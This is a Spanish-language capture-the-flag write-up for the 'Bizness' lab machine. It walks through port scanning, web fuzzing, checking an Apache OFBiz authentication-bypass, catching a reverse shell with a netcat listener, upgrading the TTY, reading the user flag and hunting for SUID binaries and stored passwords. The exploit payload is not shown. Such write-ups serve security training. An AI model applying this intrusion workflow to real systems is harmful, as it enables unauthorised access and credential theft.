Bizness
En primer lugar, vamos a enviar un paquete ICMP para ver si tenemos conectividad entre nuestra máquina y la máquina víctima.
❯ ping -c 1 10.10.11.252
PING 10.10.11.252 (10.10.11.252) 56(84) bytes of data.
64 bytes from 10.10.11.252: icmp_seq=1 ttl=63 time=111 ms
--- 10.10.11.252 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 111.295/111.295/111.295/0.000 ms
❯ whichSystem.py 10.10.11.252
10.10.11.252 (ttl -> 63): Linux
Responde y podemos ver que nos encontramos antes una máquina Linux, así que vamos a empezar a enumerar para ver que puertos están abiertos en el sistema.
❯ sudo nmap -p- --open -sS -min-rate 5000 -vvv -n -Pn 10.10.11.252 -oG allPorts
[sudo] password for oso:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 13:29 EDT
Initiating SYN Stealth Scan at 13:29
Scanning 10.10.11.252 [65535 ports]
Discovered open port 443/tcp on 10.10.11.252
Discovered open port 80/tcp on 10.10.11.252
Discovered open port 22/tcp on 10.10.11.252
Discovered open port 32995/tcp on 10.10.11.252
Completed SYN Stealth Scan at 13:29, 14.93s elapsed (65535 total ports)
Nmap scan report for 10.10.11.252
Host is up, received user-set (0.11s latency).
Scanned at 2024-05-29 13:29:32 EDT for 15s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
443/tcp open https syn-ack ttl 63
32995/tcp open unknown syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds
Raw packets sent: 73521 (3.235MB) | Rcvd: 72952 (2.918MB)
❯ extractPorts allPorts
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: extractPorts.tmp
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │
2 │ [*] Extracting information...
3 │
4 │ [*] IP Address: 10.10.11.252
5 │ [*] Open ports: 22,80,443,32995
6 │
7 │ [*] Ports copied to clipboard
Ahora voy a lanzar un escaneo exhaustivo para identificar los servicios y las versiones a las que nos enfrentamos.
❯ nmap -sCV -p22,80,443,32995 10.10.11.252 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 13:37 EDT
Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open ssl/http nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_http-title: BizNess Incorporated
|_http-server-header: nginx/1.18.0
32995/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.45 seconds
Podemos ver que se trata de un OpenSSH 8.4p1 Debian 5+deb11u3.
Voy a usar una herramienta de análisis web para identificar tecnologías usadas y descubrir info relevante.
❯ whatweb https://bizness.htb/
https://bizness.htb/ [200 OK] Bootstrap, Cookies[JSESSIONID], Country[RESERVED][ZZ], Email[info@bizness.htb], HTML5, HTTPServer[nginx/1.18.0], HttpOnly[JSESSIONID], IP[10.10.11.252], JQuery, Lightbox, Script, Title[BizNess Incorporated], nginx[1.18.0]
Similar a whatweb tenemos la extensión Wappalyzer
** Versiones de jQuery desactualizadas hacen que se pueda explotar vulns prototype pollution y XSS. **
El certificado SSL lo podemos analizar conectándolo a bizness.htb por el puerto 443 de la siguiente manera:
❯ openssl s_client -connect bizness.htb:443
Connecting to 10.10.11.252
CONNECTED(00000003)
depth=0 C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
verify error:num=18:self-signed certificate
verify return:1
depth=0 C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
verify return:1
---
Certificate chain
0 s:C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
i:C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Dec 14 20:03:40 2023 GMT; NotAfter: Nov 10 20:03:40 2328 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDbTCCAlWgAwIBAgIUcNuUwJFmLYEqrKfOdzHtcHum2IwwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCVUsxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAgFw0yMzEyMTQyMDAzNDBaGA8yMzI4
MTExMDIwMDM0MFowRTELMAkGA1UEBhMCVUsxEzARBgNVBAgMClNvbWUtU3RhdGUx
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBAK4O2guKkSjwv8sruMD3DiDi1FoappVwDJ86afPZ
XUCwlhtZD/9gPeXuRIy66QKNSzv8H7cGfzEL8peDF9YhmwvYc+IESuemPscZSlbr
tSdWXVjn4kMRlah/2PnnWZ/Rc7I237V36lbsavjkY6SgBK8EPU3mAdHNdIBqB+XH
ME/G3uP/Ut0tuhU1AAd7jiDktv8+c82EQx21/RPhuuZv7HA3pYdtkUja64bSu/kG
7FOWPxKTvYxxcWdO02GRXs+VLce+q8tQ7hRqAQI5vwWU6Ht3K82oftVPMZfT4BAp
4P4vhXvvcyhrjgjzGPH4QdDmyFkL3B4ljJfZrbXo4jXqp4kCAwEAAaNTMFEwHQYD
VR0OBBYEFKXr9HwWqLMEFnr6keuCa8Fm7JOpMB8GA1UdIwQYMBaAFKXr9HwWqLME
Fnr6keuCa8Fm7JOpMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
AFruPmKZwggy7XRwDF6EJTnNe9wAC7SZrTPC1gAaNZ+3BI5RzUaOkElU0f+YBIci
lSvcZde+dw+5aidyo5L9j3d8HAFqa/DP+xAF8Jya0LB2rIg/dSoFt0szla1jQ+Ff
6zMNMNseYhCFjHdxfroGhUwYWXEpc7kT7hL9zYy5Gbmd37oLYZAFQv+HNfjHnE+2
/gTR+RwkAf81U3b7Czl39VJhMu3eRkI3Kq8LiZYoFXr99A4oefKg1xiN3vKEtou/
c1zAVUdnau5FQSAbwjDg0XqRrs1otS0YQhyMw/3D8X+f/vPDN9rFG8l9Q5wZLmCa
zj1Tly1wsPCYAq9u570e22U=
-----END CERTIFICATE-----
subject=C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
issuer=C=UK, ST=Some-State, O=Internet Widgits Pty Ltd
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1441 bytes and written 538 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
This TLS version forbids renegotiation.
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 3AA857967EF1CF203A428EE1FC03E240BD9BF36C96AB4E16AEC6B4C8371A235C
Session-ID-ctx:
Resumption PSK: A1E3C2365CFD07CA51EF6F5B7202BF9DFAFEB632EF129043D0AF868242C46664AAAFA60E848698FDEFEA918BC202ADF8
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - a4 6c 0d 0a 6b 8b e5 9d-9b 7c 31 d4 67 c9 7b 2a .l..k....|1.g.{*
0010 - 27 50 92 e9 b8 cf 67 df-d9 53 b1 b2 b8 12 f0 49 'P....g..S.....I
0020 - 31 8d 70 bb 22 12 d8 68-d0 0a a5 6c bd 19 b8 bb 1.p."..h...l....
0030 - eb 4e 1c 82 6d 95 ba f6-8e 8b e6 17 58 6c 97 4c .N..m.......Xl.L
0040 - 3c ec a1 98 2f 68 e6 25-08 d7 d3 2d 3a 20 70 79 <.../h.%...-: py
0050 - 09 09 59 8f af 80 5a bc-c2 b7 90 52 e9 61 ec 01 ..Y...Z....R.a..
0060 - ef 0f 1d 58 41 16 ca 90-f2 1f 26 ad 8c 0c 5e 48 ...XA.....&...^H
0070 - 4e 45 0a 48 6d 1c 69 43-1d 55 db 0b 85 53 b3 4f NE.Hm.iC.U...S.O
0080 - d4 0a 49 ea e7 5b 80 ee-ad 3e 65 38 1c 4d 3c 05 ..I..[...>e8.M<.
0090 - fa 0f 41 ac 7c 8b d9 5a-5c 37 3f 16 9e 7d 1e db ..A.|..Z\7?..}..
00a0 - 80 06 5b 1c c0 90 89 3f-3d 32 d5 34 3c d0 05 8e ..[....?=2.4<...
00b0 - 4a ed 72 44 1d 61 dc a2-91 23 94 d8 34 5a c9 32 J.rD.a...#..4Z.2
00c0 - cc 98 1f 96 c6 23 19 2b-74 87 9b 5b 27 d2 20 9a .....#.+t..['. .
00d0 - 1d c1 5c 5c 52 26 67 cc-5b 32 33 5d 89 9a 76 0d ..\\R&g.[23]..v.
00e0 - 87 8e f3 8a d9 8c bd 34-74 25 5b 32 62 a0 4d 8c .......4t%[2b.M.
Start Time: 1717004826
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: E090C83DE3EB71696AD0D6C64E5223BF584DE25DDF6039E9338D66A614DC32C0
Session-ID-ctx:
Resumption PSK: CC6A97D73426CB7BE7F6A74B59F4B6742D6C9556B79E86391AFA57FCC9419716CE35074A643C5BAB98FA2EBC9F6C6FA9
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - a4 6c 0d 0a 6b 8b e5 9d-9b 7c 31 d4 67 c9 7b 2a .l..k....|1.g.{*
0010 - 73 fc 7b 30 2b da 0d dd-ca ba 0c 1f b3 6b 6e d4 s.{0+........kn.
0020 - 3b ed 41 0f c9 2e fa af-0d ac 01 48 6d 59 a5 93 ;.A........HmY..
0030 - e5 7b f7 77 29 d8 9b 88-4d af bb d8 06 5e b0 47 .{.w)...M....^.G
0040 - 4c a6 fb f3 32 58 d0 da-1f 5d 88 d9 ac ba 68 06 L...2X...]....h.
0050 - 8a 09 60 f9 08 35 b9 34-10 90 e4 e2 6a 4e a5 d7 ..`..5.4....jN..
0060 - 9d e3 3c c3 11 d8 ea 1f-c9 e3 77 53 ea 80 fe 91 ..<.......wS....
0070 - e1 3a c7 24 82 30 22 b3-a2 7b 24 c1 90 02 c1 94 .:.$.0"..{$.....
0080 - 35 16 43 8a e4 1e 92 cb-aa 89 ed e0 15 71 e9 9a 5.C..........q..
0090 - 96 c8 80 69 1f 2b 75 9a-63 ee e6 9e af 9c 55 89 ...i.+u.c.....U.
00a0 - 78 4f 3e b2 a9 32 8a 70-e8 10 94 bd 93 8e 86 64 xO>..2.p.......d
00b0 - 45 69 de 50 ab db 48 6e-de f9 8e d2 7d af ee 13 Ei.P..Hn....}...
00c0 - e4 df cc 08 29 a5 c0 38-3a 4a 8c 4d 80 dd fa 63 ....)..8:J.M...c
00d0 - f0 f0 97 9f 17 3f 5a 31-4e 5f 71 fe d6 88 87 e0 .....?Z1N_q.....
00e0 - b6 1e c3 83 f9 22 d6 84-62 5f 02 de c8 2a e6 3a ....."..b_...*.:
Start Time: 1717004826
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
Si observamos el final de la página, vemos que pone Powered by APache OFbiz
Vamos a fuzzear directorios con wfuzz para tratar de encontrar directorios ocultos. Voy a usar SecLists, que son listas que incluyen usernames, passwords, URLs, sensitive data, patterns, fuzzing payloads, web shells…
❯ wfuzz -c --hc=404,302 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt https://bizness.htb/FUZZ
Ahora si hacemos lo mismo para el directorio “control” que hemos encontrado, sacamos un login
❯ wfuzz -c --hc=404,302 --hw=1596 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt https://bizness.htb/control/FUZZ
Voy a clonar el siguiente repo Apache-OFBiz-Authentication-Bypass y voy a comprobar si es vulnerable.
❯ python3 xdetection.py --url https://bizness.htb/
[+] Scanning started...
[+] Apache OFBiz instance seems to be vulnerable.
Vamos a explotarlo. Voy a probar a ponerme a capturar el trafico icmp de la interfaz 0 y voy a probar a mandar una traza a ver si la recibimos.
Como podemos ver llegamos a ejecutar un comando porque si lo recibimos. Vamos a enviarnos una bash por el puerto 443
Vamos a hacer un tratamiento de la tty. Como siempre escribimos lo siguiente:
❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.222] from (UNKNOWN) [10.10.11.252] 58810
script /dev/null -c bash
Script started, output log file is '/dev/null'.
ofbiz@bizness:/opt/ofbiz$ ^Z
zsh: suspended nc -nlvp 443
❯ stty raw -echo; fg
[2] - continued nc -nlvp 443
reset xterm
Ahora ya podemos hacer Cntrl + C sin que se salga de la temrinal. Si queremos que funcione el Ctrl + l hacemos lo siguiente:
ofbiz@bizness:/opt/ofbiz$ export TERM=xterm
Y lo unico que faltaria son las dimensiones del nano.
ofbiz@bizness:/opt/ofbiz$ stty size
24 80
ofbiz@bizness:/opt/ofbiz$ stty rows 44 columns 184
ofbiz@bizness:/opt/ofbiz$ stty size
44 184
Y ya habremos completado el tratamiento de la tty.
USER FLAG
---------------------------
---------------------------
ofbiz@bizness:/opt/ofbiz$ pwd
/opt/ofbiz
ofbiz@bizness:/opt/ofbiz$ cd /home
ofbiz@bizness:/home$ ls
ofbiz
ofbiz@bizness:/home$ cd ofbiz/
ofbiz@bizness:~$ ls
user.txt
ofbiz@bizness:~$ cat user.txt
bd81fb57590b1e511d008f79b49c0ff8
ofbiz@bizness:~$
Intento listar los privilegios sudo del usuario pero me pide una pass
ofbiz@bizness:~$ sudo -l
[sudo] password for ofbiz:
Sorry, try again.
[sudo] password for ofbiz:
Ahora voy a sacar la info sobre la distro del SO
ofbiz@bizness:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 11 (bullseye)
Release: 11
Codename: bullseye
También podemos mostrar el so y el kernel de Linux que se está ejecutando.
ofbiz@bizness:~$ uname -a
Linux bizness 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64 GNU/Linux
Linux: Indica que el sistema operativo es Linux. || bizness: El nombre del host de la máquina (en este caso, bizness). || 5.10.0-28-amd64: La versión del kernel de Linux.
Voy a buscar desde la raíz(/)del sistema con privilegios suid para ver si hay algun binario con permisos de suid y que ese usuario sea root y se pueda explotar
fbiz@bizness:~$ find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
Para verificar que son propiedad de root se puede hacer
ofbiz@bizness:~$ ls -l /usr/bin/mount /usr/bin/su /usr/bin/fusermount /usr/bin/sudo /usr/bin/newgrp /usr/bin/chsh /usr/bin/passwd /usr/bin/gpasswd /usr/bin/chfn /usr/bin/umount /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 34896 Feb 26 2021 /usr/bin/fusermount
-rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55528 Jan 20 2022 /usr/bin/mount
-rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 71912 Jan 20 2022 /usr/bin/su
-rwsr-xr-x 1 root root 182600 Jan 14 2023 /usr/bin/sudo
-rwsr-xr-x 1 root root 35040 Jan 20 2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51336 Jun 6 2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 481608 Dec 21 11:09 /usr/lib/openssh/ssh-keysign
Pero no se ve ningun potencial. Voy a buscar recursivamente (r) en el dir actual y sus correspondientes subdirectorios los archivos que contengan password , que sea case-insensitive sin distinguir entre mayúsculas y minúsculas(i) y a listas los nombres de dichos archivos (l)
ofbiz@bizness:/opt/ofbiz$ grep -ril "password"
applications/accounting/data/helpdata/HELP_ACCOUNTING_EditPaymentGatewayConfig.xml
applications/accounting/config/AccountingUiLabels.xml
applications/accounting/config/payment.properties
applications/accounting/config/paymentTest.properties
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/authorizedotnet/AIMPaymentServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/eway/EwayServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/eway/GatewayRequest.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/orbital/OrbitalPaymentServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/verisign/PayflowPro.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/clearcommerce/CCPaymentServices.java
applications/accounting/src/main/java/org/apache/ofbiz/accounting/thirdparty/paypal/PayPalServices.java
applications/order/minilang/customer/CustomerEvents.xml
applications/marketing/testdef/CommEventCreateOpportunity_testsuite.xml
applications/workeffort/config/WorkEffortUiLabels.xml
applications/content/template/survey/ViewSurveyResponses.ftl
applications/content/template/survey/GenericSurvey.ftl
applications/content/config/ContentEntityLabels.xml
applications/content/src/main/java/org/apache/ofbiz/content/ftp/FtpServices.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/SimpleFtpClient.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/SshFtpClient.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/FtpClientInterface.java
applications/content/src/main/java/org/apache/ofbiz/content/ftp/SecureFtpClient.java
applications/content/minilang/survey/SurveyServices.xml
applications/product/data/ApiSchemaDhl.xml
applications/product/config/ProductEntityLabels.xml
applications/product/config/shipment.properties
applications/product/config/ProductUiLabels.xml
applications/product/src/main/java/org/apache/ofbiz/shipment/thirdparty/ups/UpsServices.java
applications/product/src/main/java/org/apache/ofbiz/shipment/thirdparty/dhl/DhlServices.java
applications/product/src/main/java/org/apache/ofbiz/shipment/thirdparty/usps/UspsServices.java
applications/product/src/main/java/org/apache/ofbiz/product/store/ProductStoreWorker.java
applications/product/widget/catalog/StoreForms.xml
applications/product/widget/facility/ShipmentGatewayConfigForms.xml
applications/datamodel/data/demo/WorkEffortDemoData.xml
applications/datamodel/data/demo/HumanresDemoData.xml
applications/datamodel/data/demo/MarketingDemoData.xml
applications/datamodel/data/demo/PartyDemoData.xml
applications/datamodel/data/demo/ProductDemoData.xml
applications/datamodel/data/demo/OrderDemoData.xml
applications/datamodel/data/demo/SecurityExtDemoData.xml
applications/datamodel/data/demo/ContentDemoData.xml
applications/datamodel/data/demo/AccountingDemoData.xml
applications/datamodel/data/seed/ContentSeedData.xml
applications/datamodel/data/seed/ProductSeedData.xml
applications/datamodel/entitydef/product-entitymodel.xml
applications/datamodel/entitydef/shipment-entitymodel.xml
applications/datamodel/entitydef/party-entitymodel.xml
applications/datamodel/entitydef/accounting-entitymodel.xml
applications/party/template/party/EditContactMech.ftl
applications/party/template/party/profileblocks/Contact.ftl
applications/party/webapp/partymgr/WEB-INF/controller.xml
applications/party/config/PartyUiLabels.xml
applications/party/widget/partymgr/PartyScreens.xml
applications/party/widget/partymgr/PartyForms.xml
applications/party/servicedef/secas.xml
applications/party/servicedef/services.xml
applications/party/minilang/customer/CustomerEvents.xml
applications/party/minilang/user/UserEvents.xml
applications/party/minilang/test/PartyTests.xml
applications/party/testdef/data/PartyContactMechTestData.xml
applications/securityext/template/email/PasswordEmail.ftl
applications/securityext/config/EmailPasswordUiLabels.xml
applications/securityext/src/main/java/org/apache/ofbiz/securityext/login/LoginEvents.java
applications/securityext/widget/EmailSecurityScreens.xml
applications/securityext/minilang/login/LoginSimpleEvents.xml
applications/securityext/minilang/login/LoginMapProcs.xml
applications/commonext/data/helpdata/HELP_SETUP.xml
applications/commonext/data/helpdata/HELP_SystemInfoNotes.xml
applications/commonext/widget/ofbizsetup/SetupForms.xml
applications/commonext/minilang/setup/SetupEvents.xml
runtime/data/derby/ofbiz/seg0/c6010.dat
runtime/data/derby/ofbiz/seg0/c6850.dat
runtime/data/derby/ofbiz/seg0/c5fa1.dat
runtime/data/derby/ofbiz/seg0/c180.dat
runtime/data/derby/ofbiz/seg0/c54d0.dat
runtime/data/derby/ofbiz/seg0/ca1.dat
runtime/data/derby/ofbiz/seg0/c6021.dat
runtime/data/derby/ofbiz/seg0/c60.dat
runtime/data/derby/ofbiz/seg0/c5f90.dat
runtime/data/derby/ofbiz/seg0/c191.dat
runtime/data/derby/ofbiz/seg0/c90.dat
runtime/data/derby/ofbiz/seg0/c71.dat
runtime/data/derby/ofbiz/seg0/c1930.dat
runtime/data/derby/ofbiz/seg0/c1c70.dat
runtime/data/derby/ofbiz/log/log37.dat
runtime/data/derby/ofbizolap/seg0/c180.dat
runtime/data/derby/ofbizolap/seg0/ca1.dat
runtime/data/derby/ofbizolap/seg0/c191.dat
runtime/data/derby/ofbizolap/seg0/c90.dat
runtime/data/derby/ofbiztenant/seg0/c180.dat
runtime/data/derby/ofbiztenant/seg0/ca1.dat
runtime/data/derby/ofbiztenant/seg0/c191.dat
runtime/data/derby/ofbiztenant/seg0/c90.dat
runtime/data/derby/ofbiztenant/log/log1.dat
runtime/logs/error.log
runtime/logs/access_log..2023-12-20
runtime/logs/ofbiz.log
runtime/logs/ofbiz-2023-12-16-1.log
runtime/logs/ofbiz-2023-12-16-2.log
runtime/logs/access_log..2024-05-30
runtime/logs/access_log..2023-12-16
runtime/tmp/README.adoc
framework/webapp/config/fop.properties
framework/webapp/src/main/java/org/apache/ofbiz/webapp/event/XmlRpcEventHandler.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/webdav/WebDavUtil.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/ExternalLoginKeysManager.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/LoginWorker.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/JWTManager.java
framework/webapp/src/main/java/org/apache/ofbiz/webapp/view/ApacheFopWorker.java
framework/webapp/dtd/site-conf.xsd
framework/entity/config/entityengine.xml
framework/entity/src/main/java/org/apache/ofbiz/entity/datasource/GenericHelperInfo.java
framework/entity/src/main/java/org/apache/ofbiz/entity/GenericDelegator.java
framework/entity/src/main/java/org/apache/ofbiz/entity/config/model/EntityConfig.java
framework/entity/src/main/java/org/apache/ofbiz/entity/config/model/InlineJdbc.java
framework/entity/src/main/java/org/apache/ofbiz/entity/model/ModelEntityChecker.java
framework/entity/src/main/java/org/apache/ofbiz/entity/connection/DBCPConnectionFactory.java
framework/entity/src/main/java/org/apache/ofbiz/entity/jdbc/DatabaseUtil.java
framework/entity/dtd/entity-config.xsd
framework/entity/entitydef/entitymodel.xml
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/FormStringRenderer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/macro/MacroFormRenderer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/fo/FoFormRenderer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/fo/ScreenFopViewHandler.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelFormField.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/XmlWidgetFieldVisitor.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/FieldInfo.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelFieldVisitor.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelScreen.java
framework/widget/src/main/java/org/apache/ofbiz/widget/model/ModelFormFieldBuilder.java
framework/widget/src/main/java/org/apache/ofbiz/widget/artifact/ArtifactInfoGatherer.java
framework/widget/src/main/java/org/apache/ofbiz/widget/test/WidgetMacroLibraryTests.java
framework/widget/dtd/widget-form.xsd
framework/documents/SingleSignOn.xml
framework/service/ofbiz-component.xml
framework/service/config/serviceengine.xml
framework/service/config/axis2/conf/axis2.xml
framework/service/src/main/java/org/apache/ofbiz/service/ServiceDispatcher.java
framework/service/src/main/java/org/apache/ofbiz/service/engine/XMLRPCClientEngine.java
framework/service/src/main/java/org/apache/ofbiz/service/config/model/Server.java
framework/service/src/main/java/org/apache/ofbiz/service/mail/JavaMailContainer.java
framework/service/src/main/java/org/apache/ofbiz/service/ModelServiceReader.java
framework/service/src/main/java/org/apache/ofbiz/service/xmlrpc/AliasSupportedTransportFactory.java
framework/service/src/main/java/org/apache/ofbiz/service/xmlrpc/XmlRpcClient.java
framework/service/src/main/java/org/apache/ofbiz/service/ModelService.java
framework/service/src/main/java/org/apache/ofbiz/service/rmi/socket/ssl/SSLServerSocketFactory.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsQueueListener.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsListenerFactory.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsTopicListener.java
framework/service/src/main/java/org/apache/ofbiz/service/jms/JmsServiceEngine.java
framework/service/src/main/java/org/apache/ofbiz/service/test/AbstractXmlRpcTestCase.java
framework/service/src/main/java/org/apache/ofbiz/service/test/XmlRpcTests.java
framework/service/dtd/service-config.xsd
framework/service/servicedef/services.xml
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/OFBizRealm.java
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/CatalinaContainer.java
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/SimpleCredentialHandler.java
framework/catalina/src/main/java/org/apache/ofbiz/catalina/container/HashedCredentialHandler.java
framework/base/config/jsse.properties
framework/base/config/README
framework/base/config/passwords.properties
framework/base/config/jndi.properties
framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java
framework/base/src/main/java/org/apache/ofbiz/base/util/HttpClient.java
framework/base/src/main/java/org/apache/ofbiz/base/util/UtilHttp.java
framework/base/src/main/java/org/apache/ofbiz/base/util/KeyStoreUtil.java
framework/base/src/main/java/org/apache/ofbiz/base/util/SSLUtil.java
framework/base/src/main/java/org/apache/ofbiz/base/util/FileUtil.java
framework/base/src/main/java/org/apache/ofbiz/base/component/ComponentConfig.java
framework/base/dtd/ofbiz-component.xsd
framework/resources/templates/AdminUserLoginData.xml
framework/resources/templates/AdminNewTenantData-PostgreSQL.xml
framework/resources/templates/AdminNewTenantData-Oracle.xml
framework/resources/templates/AdminNewTenantData-Derby.xml
framework/resources/templates/AdminNewTenantData-MySQL.xml
framework/common/data/CommonSystemPropertyData.xml
framework/common/data/CommonTypeData.xml
framework/common/config/SecurityUiLabels.xml
framework/common/config/general.properties
framework/common/config/CommonUiLabels.xml
framework/common/config/ftp.properties
framework/common/config/CommonEntityLabels.xml
framework/common/config/SecurityextUiLabels.xml
framework/common/src/main/java/org/apache/ofbiz/common/FtpServices.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/example/TestFailAuthenticator.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/example/TestPassAuthenticator.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/api/Authenticator.java
framework/common/src/main/java/org/apache/ofbiz/common/authentication/AuthHelper.java
framework/common/src/main/java/org/apache/ofbiz/common/email/EmailServices.java
framework/common/src/main/java/org/apache/ofbiz/common/login/LoginServices.java
framework/common/src/main/java/org/apache/ofbiz/common/login/LdapAuthenticationServices.java
framework/common/widget/CommonScreens.xml
framework/common/widget/SecurityScreens.xml
framework/common/widget/SecurityForms.xml
framework/common/servicedef/services_email.xml
framework/common/servicedef/services.xml
framework/common/documents/SendingEmail.xml
framework/common/webcommon/WEB-INF/common-controller.xml
framework/common/webcommon/WEB-INF/security-controller.xml
framework/common/minilang/test/UserLoginTests.xml
framework/datafile/dtd/datafiles.xsd
framework/webtools/config/WebtoolsUiLabels.xml
framework/security/ofbiz-component.xml
framework/security/data/PasswordSecurityDemoData.xml
framework/security/config/security.properties
framework/security/config/jndiLdap.properties
framework/security/src/main/java/org/apache/ofbiz/security/SecurityUtil.java
